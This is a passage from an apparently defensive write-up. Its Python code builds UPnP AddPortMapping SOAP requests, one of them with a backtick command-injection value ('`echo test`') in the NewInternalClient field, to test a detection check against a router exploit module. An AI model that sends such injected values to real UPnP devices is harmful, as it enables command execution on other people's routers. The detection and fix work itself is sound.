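        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="%s" '
        'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<SOAP-ENV:Body>'
        '<m:AddPortMapping xmlns:m="%s">'
        '<NewPortMappingDescription>demo</NewPortMappingDescription>'
        '<NewLeaseDuration></NewLeaseDuration>'
        '<NewInternalClient>%s</NewInternalClient>'
        '<NewEnabled>1</NewEnabled>'
        '<NewExternalPort>8080</NewExternalPort>'
        '<NewRemoteHost></NewRemoteHost>'
        '<NewProtocol>TCP</NewProtocol>'
        '<NewInternalPort>80</NewInternalPort>'
        '</m:AddPortMapping>'
        '</SOAP-ENV:Body></SOAP-ENV:Envelope>'
    ) % (SOAP_NS_ALT, UPNP_NS, internal_client)


# Constructed samples: a legitimate LAN host, and the module's backtick pattern
# with a harmless command standing in for its payload.
BENIGN_REQUEST = _envelope("192.168.0.10")
INJECTED_REQUEST = _envelope("`echo test`")

if __name__ == "__main__":
    for sample in (BENIGN_REQUEST, INJECTED_REQUEST):
        print(check_add_port_mapping(sample))
```

The same check applied in the UPnP daemon itself, before the value is ever passed to a shell, is the fix; applied on a network sensor it is a detection rule for the request the module emits.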